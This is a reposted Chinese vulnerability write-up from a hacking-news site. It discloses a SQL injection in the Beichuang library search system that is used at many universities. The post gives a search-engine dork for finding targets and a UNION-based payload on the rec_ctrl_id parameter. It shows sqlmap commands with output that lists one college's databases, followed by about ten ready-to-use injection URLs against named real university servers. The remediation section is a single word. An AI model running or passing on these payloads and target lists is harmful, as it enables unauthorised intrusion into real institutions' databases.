记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

北创图书检索系统SQL注入漏洞之一

2014-12-12 21:15

北创图书检索系统某处过滤不严导致SQL注入,影响众多高校


百度搜索:inurl:/opac_two/search2
 

1.png

 


注入链接: /opac_two/search2/shelves_checkout.jsp?library_id= &rec_ctrl_id=

注入参数: rec_ctrl_id
Payload: library_id=A&rec_ctrl_id=0195033665'+and+1=2+union+select+NULL,'111111',NULL,NULL,NULL,NULL,NULL,NULL,NULL-- (基于mssql数据库

 

 


以北京女子学院http://219.242.31.130:8080/opac_two/作为测试案例

测试链接: http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665
(1)UNION注入
http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665'+and+1=2+union+select+NULL,'111111',NULL,NULL,NULL,NULL,NULL,NULL,NULL--

 

1.png


(2)sqlmap注入
 


$ py sqlmap.py -u 'http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665' -p rec_ctrl_id --level 5 --risk 3 --random-agent --dbs -v 1 --batch
---
Place: GET
Parameter: rec_ctrl_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: library_id=A&rec_ctrl_id=0195033665' AND 8430=8430 AND 'LBSb'='LBSb

Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: library_id=A&rec_ctrl_id=0195033665' UNION ALL SELECT NULL,CHAR(113)+CHAR(110)+CHAR(99)+CHAR(112)+CHAR(113)+CHAR(86)+CHAR(102)+CHAR(72)+CHAR(89)+CHAR(

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: library_id=A&rec_ctrl_id=0195033665' AND 8352=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sy
---
[18:13:54] [INFO] testing Microsoft SQL Server
[18:13:54] [INFO] confirming Microsoft SQL Server
[18:14:00] [WARNING] reflective value(s) found and filtering out
[18:14:10] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server Unknown
[18:14:14] [INFO] fetching database names
available databases [6]:
[*] master
[*] melinets
[*] model
[*] sybsystemdb
[*] sybsystemprocs
[*] tempdb

 

2.png

 


其他测试案例:(基于mssql数据库

(1)http://opac.lnu.edu.cn/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

 

1.png


py sqlmap.py -u 'http://opac.lnu.edu.cn/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665' -p rec_ctrl_id --level 5 --risk 3 --technique=U --union-cols=9 --dbms mssql --dbs --batch

2.png


(2)http://202.118.84.134:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

3.png


(3)http://219.218.26.4:85/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

4.png


(4)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

5.png


(5)http://218.107.150.8/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

6.png


(6)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

7.png


(7)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

8.png


(8)http://202.118.84.134:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

9.png


(9)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

10.png


(10)http://218.107.150.8/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

11.png

 

 

解决方案:

过滤

 
知识来源: www.2cto.com/Article/201412/360403.html

阅读:186300 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“北创图书检索系统SQL注入漏洞之一”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云